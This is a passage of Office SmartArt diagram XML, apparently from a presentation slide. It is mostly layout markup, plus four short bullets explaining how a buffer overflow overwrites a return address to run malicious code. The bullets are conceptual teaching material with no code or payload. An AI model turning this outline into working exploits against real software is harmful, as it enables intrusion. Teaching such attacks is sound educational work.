      <dgm:prSet presAssocID="{5C7152C7-70CE-4590-9581-CAD7C040C625}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A54C10F-B02E-44B7-88C9-CD7310413B6C}" type="pres">
      <dgm:prSet presAssocID="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" type="pres">
      <dgm:prSet presAssocID="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8626CD8-70B2-431D-A6E0-E3CB86D15B5F}" type="pres">
      <dgm:prSet presAssocID="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" type="pres">
      <dgm:prSet presAssocID="{2970D06E-C997-4BA8-8DF5-5110013226ED}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7D0FD6E-B57A-454A-A439-6EB6EEB649E5}" type="pres">
      <dgm:prSet presAssocID="{66DB45F4-659C-4131-B8FA-FCB3C749616F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" type="pres">
      <dgm:prSet presAssocID="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C0F997D-1F1C-4204-9C67-6F58E5191839}" type="pres">
      <dgm:prSet presAssocID="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" type="pres">
      <dgm:prSet presAssocID="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E261A84A-A46B-4334-91B1-2DDF1D2ECC98}" type="pres">
      <dgm:prSet presAssocID="{D1196959-A24D-43E0-9C76-4A69D45563D5}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" type="pres">
      <dgm:prSet presAssocID="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" presName="parentText" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A526008-01D5-4013-9242-90D55846E70F}" type="pres">
      <dgm:prSet presAssocID="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}" type="pres">
      <dgm:prSet presAssocID="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" presName="parentText" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7E272900-85E8-4D20-88E3-741D04AC35FA}" type="presOf" srcId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" destId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FCB5DF0D-D126-4DC0-B673-7BC8195ED6AA}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{2970D06E-C997-4BA8-8DF5-5110013226ED}" srcOrd="4" destOrd="0" parTransId="{E83A23C0-42E3-41C1-BDD8-0C9A073E86BD}" sibTransId="{66DB45F4-659C-4131-B8FA-FCB3C749616F}"/>
    <dgm:cxn modelId="{AAA33C16-07FD-4CE5-9303-0B9022C37CA6}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" srcOrd="5" destOrd="0" parTransId="{26F69B7D-9226-4D56-8BEB-4EBD7EA4F6CC}" sibTransId="{AC1F8055-0306-4FCD-A3E2-3AE2905B74DA}"/>
    <dgm:cxn modelId="{9062C91D-9AAF-42CC-AEE2-BB04F84406C1}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" srcOrd="0" destOrd="0" parTransId="{C70C1B72-3E93-4834-B3B0-8C5903EECE07}" sibTransId="{F3AD596C-65CE-40E6-B95C-B05871B740AA}"/>
    <dgm:cxn modelId="{D48B4138-EC5E-41E1-8C51-18A0BC8785B3}" type="presOf" srcId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" destId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9ED7EC5F-2DAD-4FAB-80C4-525D7BB44014}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" srcOrd="3" destOrd="0" parTransId="{344A0C3E-BA1B-461E-B7F2-1F6079AFFA65}" sibTransId="{14930EB4-ACB2-4E3A-AEE5-EB313022C092}"/>
    <dgm:cxn modelId="{C7EC7163-2DA7-4612-A0FF-FC6A027DB66E}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" srcOrd="1" destOrd="0" parTransId="{78999592-A927-4B29-AA41-EEB0CBD89704}" sibTransId="{6005CB17-1283-4C25-B39A-25A09B46E397}"/>
    <dgm:cxn modelId="{D02E1E6E-E549-4DB9-81D4-CC8FBAAEA8C2}" type="presOf" srcId="{6C7ACB69-5BBA-40BE-87DB-7F95B827DCFA}" destId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{448E8E72-B623-4380-BCA0-026EF6C68A5D}" type="presOf" srcId="{B3802C71-E230-405F-B4C0-E81AB3CF5DD8}" destId="{AE591548-E246-458E-97D2-E81065480C3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E0371573-4C90-46EB-85E8-8F5B23B95024}" type="presOf" srcId="{5C7152C7-70CE-4590-9581-CAD7C040C625}" destId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90AF2E76-A9BC-40D8-A934-FC517EF4FE40}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" srcOrd="7" destOrd="0" parTransId="{AD5B0145-89CC-4971-9FED-BF344596FD67}" sibTransId="{A0D9F33D-4D84-4577-8DDD-BE310AF948EE}"/>
    <dgm:cxn modelId="{D1C98779-F4BB-44D7-87CF-72005316C176}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{D23B75A2-C7B1-42F6-9BF7-8F6F6004566F}" srcOrd="8" destOrd="0" parTransId="{46E11D4C-907C-4A9A-9CA7-7BC903F65967}" sibTransId="{3CF4F287-1D54-4E82-80EE-040326C49DCB}"/>
    <dgm:cxn modelId="{45105889-89EA-462D-AD41-50D3C8B7957B}" type="presOf" srcId="{DDD5BBB3-0AA2-4B2B-A48B-997B04FFA29A}" destId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FC6C799D-1C86-463A-8A2F-83F291B8BB19}" type="presOf" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A74B7BAE-F460-4D09-9D77-EEFA4CAC2E1A}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{BD41F568-B9F1-4DC4-B361-F553D5D72888}" srcOrd="6" destOrd="0" parTransId="{0640B4A8-37FB-4C56-9F63-92E2EBD40589}" sibTransId="{D1196959-A24D-43E0-9C76-4A69D45563D5}"/>
    <dgm:cxn modelId="{87417BB4-463A-4A53-8520-2A36DD68A20E}" srcId="{A75E5C91-3922-418F-B8F7-464EB36B891A}" destId="{5C7152C7-70CE-4590-9581-CAD7C040C625}" srcOrd="2" destOrd="0" parTransId="{7C06557E-9994-4557-A400-DE87286DE6DD}" sibTransId="{8EBA70B1-F6AF-4E08-94F6-CDD6D45A9669}"/>
    <dgm:cxn modelId="{56D013CE-3B0E-4380-A2F5-F08036398D00}" type="presOf" srcId="{2970D06E-C997-4BA8-8DF5-5110013226ED}" destId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F8A917D2-EF56-4E5A-AECF-758ECA877F80}" type="presOf" srcId="{8BD14A9F-4858-43A0-9ADC-7180E9F3E517}" destId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{066C7FD5-2521-4851-A2ED-4EAD48BE3744}" type="presOf" srcId="{C8C475B4-4F99-4F4F-B724-41AE4C011D5F}" destId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{84F7AF34-711A-4C69-9755-B05805214A01}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{AE591548-E246-458E-97D2-E81065480C3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{91A0E578-219F-4073-AFEF-081F8D703806}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{6EE90F11-71A2-4A5E-8C8D-0248B580212A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{553B58E2-F91D-4708-A583-E15FD3FB5E24}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BE5BAB00-ACF5-40F5-A9DD-21C9BCFB1557}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{BF89C33F-5E60-42A1-AB50-F7FB1CBD10CF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D238FB49-4106-4985-A7EB-F65BD64F4F59}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7E06C0DD-684D-4C63-9D65-65ED00DF7409}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{3A54C10F-B02E-44B7-88C9-CD7310413B6C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3B53BCB-5121-471F-A1FD-256FA8B88767}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EC674932-F46F-4D16-93DC-D7029D44BF68}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4E79D0A8-FFD9-4624-AE47-C4AF8EE1F31F}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E8626CD8-70B2-431D-A6E0-E3CB86D15B5F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C64D7027-EC4D-4DEE-8D61-2B06EBAF9B11}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{12B30620-5BE8-44AC-A70C-86833235243B}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{C7D0FD6E-B57A-454A-A439-6EB6EEB649E5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C0B2C0EF-8801-42A4-8AE4-DB86C8F2A449}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EC01BD2E-3C2A-4FD2-A432-37E62A1780CD}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{1C0F997D-1F1C-4204-9C67-6F58E5191839}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B7D4D364-BC1B-412C-B48E-1FB0C7F64ADE}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2A5B6695-C748-44F3-AD04-4350B1B790CE}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{E261A84A-A46B-4334-91B1-2DDF1D2ECC98}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{741A3788-7453-415C-8C82-878CC509CAB8}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{53C1D4A2-AF2F-4750-BB1F-35A8FD41A489}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{2A526008-01D5-4013-9242-90D55846E70F}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FB1C73DE-D607-447F-9CE8-99EC345FCAAC}" type="presParOf" srcId="{6A85540B-37B2-45DA-8D06-D451F95A4C4D}" destId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFC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4A8A97-2947-4889-99F3-AB46E9BB142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71700D0-AAA4-4EAA-9361-601A2099FE85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Special attack that exploits the lack of input length validation to a buffer.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05BE0EFD-BBA8-4048-A4B6-37AC89322038}" type="parTrans" cxnId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55FD3897-4E2D-4EF3-AE70-06234756C71E}" type="sibTrans" cxnId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>After that it overwrite the adjacent memory next to the buffer.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8451188-E6BC-481B-B66E-183D21559E9E}" type="parTrans" cxnId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D388AD04-7A97-463A-A4A4-C641F6C34237}" type="sibTrans" cxnId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>I can exploit this behavior by overwriting the return address and make it point to my exploit in the machine.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B710B920-CCCB-4A38-BBE5-8F07B1C8FEAA}" type="parTrans" cxnId="{4859E305-5097-413C-B4F5-397216D23CCE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F2D981-BBEA-4982-835E-96A9F98BA54D}" type="sibTrans" cxnId="{4859E305-5097-413C-B4F5-397216D23CCE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E07FA459-BF60-45C1-937E-618087AB338A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Once the return address is overwritten and the function running is finished the machine will jump to the malicious code and execute it.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33E33C96-1BEA-4D2C-9272-BA50AD801E72}" type="parTrans" cxnId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FCFB912-2B2C-48C3-B4F7-027555F2EB18}" type="sibTrans" cxnId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" type="pres">
      <dgm:prSet presAssocID="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" type="pres">
      <dgm:prSet presAssocID="{871700D0-AAA4-4EAA-9361-601A2099FE85}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CFCDEAA9-9C09-4AB8-9354-4141B1E6C09D}" type="pres">
      <dgm:prSet presAssocID="{55FD3897-4E2D-4EF3-AE70-06234756C71E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" type="pres">
      <dgm:prSet presAssocID="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29F04727-FEC2-4264-9E0C-CC630F4739A8}" type="pres">
      <dgm:prSet presAssocID="{D388AD04-7A97-463A-A4A4-C641F6C34237}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" type="pres">
      <dgm:prSet presAssocID="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B211F55F-0C42-4F6F-AF65-8144B7BFF4CA}" type="pres">
      <dgm:prSet presAssocID="{07F2D981-BBEA-4982-835E-96A9F98BA54D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}" type="pres">
      <dgm:prSet presAssocID="{E07FA459-BF60-45C1-937E-618087AB338A}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4859E305-5097-413C-B4F5-397216D23CCE}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" srcOrd="2" destOrd="0" parTransId="{B710B920-CCCB-4A38-BBE5-8F07B1C8FEAA}" sibTransId="{07F2D981-BBEA-4982-835E-96A9F98BA54D}"/>
    <dgm:cxn modelId="{09010A2D-9D01-4D55-B52F-46598F9BA9A1}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{871700D0-AAA4-4EAA-9361-601A2099FE85}" srcOrd="0" destOrd="0" parTransId="{05BE0EFD-BBA8-4048-A4B6-37AC89322038}" sibTransId="{55FD3897-4E2D-4EF3-AE70-06234756C71E}"/>
    <dgm:cxn modelId="{0ABC2D32-63DD-4D86-A709-97BD6B7C7B66}" type="presOf" srcId="{74E04BEF-1E15-4308-BE94-89C071D6FE1B}" destId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EF743588-8AEA-4171-B568-09B6BDAF84F9}" type="presOf" srcId="{E07FA459-BF60-45C1-937E-618087AB338A}" destId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{88964C97-0DA4-4400-9B5D-C7DD28855A3D}" type="presOf" srcId="{871700D0-AAA4-4EAA-9361-601A2099FE85}" destId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{92FC6D98-8CE3-4DDA-8BD4-EEDF6622DC65}" type="presOf" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3A4640AD-936A-4EE0-AE8E-EF58176E86DC}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{E07FA459-BF60-45C1-937E-618087AB338A}" srcOrd="3" destOrd="0" parTransId="{33E33C96-1BEA-4D2C-9272-BA50AD801E72}" sibTransId="{0FCFB912-2B2C-48C3-B4F7-027555F2EB18}"/>
    <dgm:cxn modelId="{80A3C0BE-DCA0-4D95-BC90-292C56E4D6F6}" type="presOf" srcId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" destId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47464EE8-27E5-4F0E-9EA9-B63F8AD56B8B}" srcId="{ED4A8A97-2947-4889-99F3-AB46E9BB1427}" destId="{2416BD6D-5FDC-4360-AE15-4521E32CDC01}" srcOrd="1" destOrd="0" parTransId="{C8451188-E6BC-481B-B66E-183D21559E9E}" sibTransId="{D388AD04-7A97-463A-A4A4-C641F6C34237}"/>
    <dgm:cxn modelId="{3B7A5DF7-69CE-4DAD-AAA1-03B4C4065D06}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{D3E57C07-7A1F-44F1-809E-64C8EAC4CE73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{99FAF2EB-C9FB-4BE4-A4B7-41CD7B8CF583}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{CFCDEAA9-9C09-4AB8-9354-4141B1E6C09D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DE70217B-8FBA-4BDE-AF8D-4030BA3AB271}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E00F15A7-FF9E-49E9-A416-AFAC80CCAF07}" type="presParOf" srcId="{BFDAE1EC-5F38-421C-8D15-9CAEA8FE44AF}" destId="{29F04727-FEC2-4264-9E0C-CC630F4739A8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
